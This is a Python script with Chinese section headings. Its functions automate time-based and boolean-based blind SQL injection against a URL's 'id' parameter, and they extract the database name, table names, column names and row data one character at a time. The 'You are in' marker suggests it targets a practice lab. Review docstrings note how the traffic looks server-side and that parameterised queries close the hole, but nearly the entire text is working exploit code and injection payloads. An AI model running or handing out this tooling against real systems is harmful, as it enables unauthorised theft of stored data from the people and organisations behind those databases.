时间盲注
获取库
def inject_database(url: str) -> str | None:
    """Recover the current database name character by character via a timing side channel.

    For each character position ``i`` the ASCII value is located by a binary
    search over 32..127. The probe is sent in the ``id`` query parameter and
    asks the server to ``sleep(2)`` when the character is greater than ``mid``;
    a response that takes at least 2 s (or exceeds the 10 s client timeout) is
    read as "greater".

    Args:
        url: Endpoint that receives the ``id`` query parameter.

    Returns:
        The recovered name, or ``None`` when a non-timeout request error occurs
        part-way through (partial progress is discarded).

    Server-side, this appears as a burst of GET requests whose ``id`` value
    contains ``sleep(2)`` and a moving ``substr(database(), i, 1)`` offset,
    each completing in either ~0 s or ~2 s; parameterised queries remove the
    injection point and request-duration logging makes the pattern visible.

    NOTE(review): ``time`` and ``requests`` are used but no import is visible
    in this file. A second ``inject_database`` (boolean-based) is defined later
    in the same file; if both live in one module the later one shadows this.
    """
    dataname = ''
    # At most 19 characters are recovered (positions 1..19).
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        # Binary search: narrows [low, high) until a single code point remains.
        while low < high:
            payload = f"1' and if(ascii(substr(database(),{i},1))>{mid},sleep(2),0)-- "
            res = {"id": payload}
            start_time = time.time()
            try:
                # Response body is never read; only the elapsed time matters.
                r = requests.get(url, params=res, timeout=10)
            except requests.exceptions.Timeout:
                # A client-side timeout is treated the same as a 2 s delay.
                low = mid + 1
            except requests.exceptions.RequestException as e:
                print(f"请求失败:{e}")
                return None
            else:
                elapsed_time = time.time() - start_time
                if elapsed_time >= 2:
                    low = mid + 1
                else:
                    high = mid
            # Recompute the probe point after either outcome.
            mid = (low + high) // 2
        # Search never moved off the lower bound (space): treated as end of name.
        if low == 32:
            break
        dataname += chr(low)
    print("数据库名:", dataname)
    return dataname
获取表
def inject_tables(url: str, database: str) -> list[str] | None:
    """Recover table names of ``database`` from ``information_schema.tables`` via a timing side channel.

    Row ``i`` is selected with ``LIMIT i-1,1``; each character ``j`` of that
    row is resolved by a binary search over ASCII 32..127 using the same
    ``sleep(2)`` / timeout decision as the database-name routine. Enumeration
    of rows stops at the first row that yields an empty name.

    Args:
        url: Endpoint that receives the ``id`` query parameter.
        database: Schema name; interpolated directly into the probe string.

    Returns:
        The list of recovered names, or ``None`` when a non-timeout request
        error occurs (names recovered so far are discarded).

    NOTE(review): ``time`` and ``requests`` are used but no import is visible
    in this file. A boolean-based ``inject_tables`` is defined later in the
    same file and shadows this one if both are in a single module.
    """
    tables = []
    # Up to 19 rows, up to 99 characters per name.
    for i in range(1, 20):
        table_name = ''
        for j in range(1, 100):
            low = 32
            high = 128
            mid = (low + high) // 2
            while low < high:
                payload = f"1' and if(ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema='{database}' LIMIT {i-1},1),{j},1))>{mid},sleep(2),0)-- "
                res = {"id": payload}
                start_time = time.time()
                try:
                    # Response body is never read; only the elapsed time matters.
                    r = requests.get(url, params=res, timeout=10)
                except requests.exceptions.Timeout:
                    # A client-side timeout is treated the same as a 2 s delay.
                    low = mid + 1
                except requests.exceptions.RequestException as e:
                    print(f"请求失败:{e}")
                    return None
                else:
                    elapsed_time = time.time() - start_time
                    if elapsed_time >= 2:
                        low = mid + 1
                    else:
                        high = mid
                # Recompute the probe point after either outcome.
                mid = (low + high) // 2
            # Lower bound never moved (space): end of this name.
            if low == 32:
                break
            table_name += chr(low)
        if table_name:
            tables.append(table_name)
        else:
            # An empty name means no further rows.
            break
    print("表名列表:", tables)
    return tables
获取列
def inject_columns(url: str, database: str, table: str) -> list[str] | None:
    """Recover column names of ``database.table`` from ``information_schema.columns`` via a timing side channel.

    Same structure as the table routine: row ``i`` via ``LIMIT i-1,1``,
    character ``j`` via binary search over ASCII 32..127, a ``sleep(2)`` or
    client timeout meaning "greater than ``mid``". Stops at the first row that
    yields an empty name.

    Args:
        url: Endpoint that receives the ``id`` query parameter.
        database: Schema name; interpolated directly into the probe string.
        table: Table name; interpolated directly into the probe string.

    Returns:
        The recovered column names, or ``None`` on a non-timeout request
        error (partial progress is discarded).

    NOTE(review): ``time`` and ``requests`` are used but no import is visible
    in this file. A boolean-based ``inject_columns`` defined later in the file
    shadows this one if both are in a single module.
    """
    columns = []
    # Up to 19 rows, up to 99 characters per name.
    for i in range(1, 20):
        column_name = ''
        for j in range(1, 100):
            low = 32
            high = 128
            mid = (low + high) // 2
            while low < high:
                payload = f"1' and if(ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_schema='{database}' AND table_name='{table}' LIMIT {i-1},1),{j},1))>{mid},sleep(2),0)-- "
                res = {"id": payload}
                start_time = time.time()
                try:
                    # Response body is never read; only the elapsed time matters.
                    r = requests.get(url, params=res, timeout=10)
                except requests.exceptions.Timeout:
                    # A client-side timeout is treated the same as a 2 s delay.
                    low = mid + 1
                except requests.exceptions.RequestException as e:
                    print(f"请求失败:{e}")
                    return None
                else:
                    elapsed_time = time.time() - start_time
                    if elapsed_time >= 2:
                        low = mid + 1
                    else:
                        high = mid
                # Recompute the probe point after either outcome.
                mid = (low + high) // 2
            # Lower bound never moved (space): end of this name.
            if low == 32:
                break
            column_name += chr(low)
        if column_name:
            columns.append(column_name)
        else:
            # An empty name means no further rows.
            break
    print(f"表 {table} 的列名列表:", columns)
    return columns
获取数据
def inject_data(url: str, database: str, table: str, column: str) -> list[str] | None:
    """Recover the values of one column, row by row, via a timing side channel.

    Row ``i`` is read with ``SELECT column FROM database.table LIMIT i-1,1``;
    each character ``j`` is resolved by binary search over ASCII 32..127 with
    the same ``sleep(2)`` / timeout decision used by the other routines.
    Row enumeration stops at the first empty value.

    Args:
        url: Endpoint that receives the ``id`` query parameter.
        database: Schema name; interpolated directly into the probe string.
        table: Table name; interpolated directly into the probe string.
        column: Column name; interpolated directly into the probe string.

    Returns:
        The recovered values, or ``None`` on a non-timeout request error
        (values recovered so far are discarded).

    NOTE(review): ``time`` and ``requests`` are used but no import is visible
    in this file. A boolean-based ``inject_data`` defined later in the file
    shadows this one if both are in a single module.
    """
    data = []
    # Up to 99 rows here (the other routines stop at 19), 99 characters each.
    for i in range(1, 100):
        value = ''
        for j in range(1, 100):
            low = 32
            high = 128
            mid = (low + high) // 2
            while low < high:
                payload = f"1' and if(ascii(substr((SELECT {column} FROM {database}.{table} LIMIT {i-1},1),{j},1))>{mid},sleep(2),0)-- "
                res = {"id": payload}
                start_time = time.time()
                try:
                    # Response body is never read; only the elapsed time matters.
                    r = requests.get(url, params=res, timeout=10)
                except requests.exceptions.Timeout:
                    # A client-side timeout is treated the same as a 2 s delay.
                    low = mid + 1
                except requests.exceptions.RequestException as e:
                    print(f"请求失败:{e}")
                    return None
                else:
                    elapsed_time = time.time() - start_time
                    if elapsed_time >= 2:
                        low = mid + 1
                    else:
                        high = mid
                # Recompute the probe point after either outcome.
                mid = (low + high) // 2
            # Lower bound never moved (space): end of this value.
            if low == 32:
                break
            value += chr(low)
        if value:
            data.append(value)
        else:
            # An empty value means no further rows.
            break
    print(f"表 {table} 的列 {column} 数据:", data)
    return data
布尔盲注
获取库
def inject_database(url: str) -> str | None:
    """Recover the current database name character by character via a boolean side channel.

    Each character position ``i`` is located by a binary search over ASCII
    32..127. The comparison is sent in the ``id`` query parameter and the
    decision is made on the response body: the marker text ``"You are in"``
    present means "greater than ``mid``", absent means "not greater".

    Args:
        url: Endpoint that receives the ``id`` query parameter.

    Returns:
        The recovered name, or ``None`` when a request error occurs part-way
        through (partial progress is discarded).

    Server-side, this appears as a burst of GET requests whose ``id`` value
    contains a moving ``substr(database(), i, 1)`` offset and comparison
    value; parameterised queries remove the injection point, and a response
    that does not vary with the injected condition removes the oracle.

    NOTE(review): this redefines the time-based ``inject_database`` declared
    earlier in the file, which is shadowed when both are in one module.
    ``requests`` is used but no import is visible in this file.
    """
    dataname = ''
    # At most 19 characters are recovered (positions 1..19).
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        # Binary search: narrows [low, high) until a single code point remains.
        while low < high:
            payload = f"1' and ascii(substr(database(),{i},1)) > {mid}-- "
            res = {"id": payload}
            try:
                # NOTE(review): no timeout= is passed here, unlike the time-based variant.
                r = requests.get(url, params=res)
            except requests.exceptions.RequestException as e:
                print(f"请求失败:{e}")
                return None
            # The marker string is the oracle: present means the condition held.
            if "You are in" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # Search never moved off the lower bound (space): treated as end of name.
        if low == 32:
            break
        dataname += chr(low)
    print("数据库名:", dataname)
    return dataname
获取表
def inject_tables(url: str, database: str) -> list[str] | None:
    """Recover table names of ``database`` from ``information_schema.tables`` via a boolean side channel.

    Row ``i`` is selected with ``LIMIT i-1,1``; character ``j`` of that row is
    resolved by binary search over ASCII 32..127, using the presence of
    ``"You are in"`` in the response body as the "greater than ``mid``"
    signal. Row enumeration stops at the first empty name.

    Args:
        url: Endpoint that receives the ``id`` query parameter.
        database: Schema name; interpolated directly into the probe string.

    Returns:
        The recovered names, or ``None`` on a request error (names recovered
        so far are discarded).

    NOTE(review): this redefines the time-based ``inject_tables`` declared
    earlier in the file. ``requests`` is used but no import is visible here.
    """
    tables = []
    # Up to 19 rows and 19 characters per name (the time-based variant allows 99).
    for i in range(1, 20):
        table_name = ''
        for j in range(1, 20):
            low = 32
            high = 128
            mid = (low + high) // 2
            while low < high:
                payload = f"1' and ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema='{database}' LIMIT {i-1},1),{j},1)) > {mid}-- "
                res = {"id": payload}
                try:
                    # NOTE(review): no timeout= is passed here.
                    r = requests.get(url, params=res)
                except requests.exceptions.RequestException as e:
                    print(f"请求失败:{e}")
                    return None
                # Marker present means the injected condition held.
                if "You are in" in r.text:
                    low = mid + 1
                else:
                    high = mid
                mid = (low + high) // 2
            # Lower bound never moved (space): end of this name.
            if low == 32:
                break
            table_name += chr(low)
        if table_name:
            tables.append(table_name)
        else:
            # An empty name means no further rows.
            break
    print("表名列表:", tables)
    return tables
获取列
def inject_columns(url: str, database: str, table: str) -> list[str] | None:
    """Recover column names of ``database.table`` from ``information_schema.columns`` via a boolean side channel.

    Row ``i`` via ``LIMIT i-1,1``, character ``j`` via binary search over
    ASCII 32..127; the presence of ``"You are in"`` in the response body is
    the "greater than ``mid``" signal. Stops at the first empty name.

    Args:
        url: Endpoint that receives the ``id`` query parameter.
        database: Schema name; interpolated directly into the probe string.
        table: Table name; interpolated directly into the probe string.

    Returns:
        The recovered column names, or ``None`` on a request error (partial
        progress is discarded).

    NOTE(review): this redefines the time-based ``inject_columns`` declared
    earlier in the file. ``requests`` is used but no import is visible here.
    """
    columns = []
    # Up to 19 rows and 19 characters per name.
    for i in range(1, 20):
        column_name = ''
        for j in range(1, 20):
            low = 32
            high = 128
            mid = (low + high) // 2
            while low < high:
                payload = f"1' and ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_schema='{database}' AND table_name='{table}' LIMIT {i-1},1),{j},1)) > {mid}-- "
                res = {"id": payload}
                try:
                    # NOTE(review): no timeout= is passed here.
                    r = requests.get(url, params=res)
                except requests.exceptions.RequestException as e:
                    print(f"请求失败:{e}")
                    return None
                # Marker present means the injected condition held.
                if "You are in" in r.text:
                    low = mid + 1
                else:
                    high = mid
                mid = (low + high) // 2
            # Lower bound never moved (space): end of this name.
            if low == 32:
                break
            column_name += chr(low)
        if column_name:
            columns.append(column_name)
        else:
            # An empty name means no further rows.
            break
    print(f"表 {table} 的列名列表:", columns)
    return columns
获取数据
def inject_data(url: str, database: str, table: str, column: str) -> list[str] | None:
    """Recover the values of one column, row by row, via a boolean side channel.

    Row ``i`` is read with ``SELECT column FROM database.table LIMIT i-1,1``;
    character ``j`` is resolved by binary search over ASCII 32..127 using the
    presence of ``"You are in"`` in the response body as the "greater than
    ``mid``" signal. Row enumeration stops at the first empty value.

    Args:
        url: Endpoint that receives the ``id`` query parameter.
        database: Schema name; interpolated directly into the probe string.
        table: Table name; interpolated directly into the probe string.
        column: Column name; interpolated directly into the probe string.

    Returns:
        The recovered values, or ``None`` on a request error (values
        recovered so far are discarded).

    NOTE(review): this redefines the time-based ``inject_data`` declared
    earlier in the file. ``requests`` is used but no import is visible here.
    """
    data = []
    # Up to 19 rows and 19 characters per value (the time-based variant allows 99).
    for i in range(1, 20):
        value = ''
        for j in range(1, 20):
            low = 32
            high = 128
            mid = (low + high) // 2
            while low < high:
                payload = f"1' and ascii(substr((SELECT {column} FROM {database}.{table} LIMIT {i-1},1),{j},1)) > {mid}-- "
                res = {"id": payload}
                try:
                    # NOTE(review): no timeout= is passed here.
                    r = requests.get(url, params=res)
                except requests.exceptions.RequestException as e:
                    print(f"请求失败:{e}")
                    return None
                # Marker present means the injected condition held.
                if "You are in" in r.text:
                    low = mid + 1
                else:
                    high = mid
                mid = (low + high) // 2
            # Lower bound never moved (space): end of this value.
            if low == 32:
                break
            value += chr(low)
        if value:
            data.append(value)
        else:
            # An empty value means no further rows.
            break
    print(f"表 {table} 的列 {column} 数据:", data)
    return data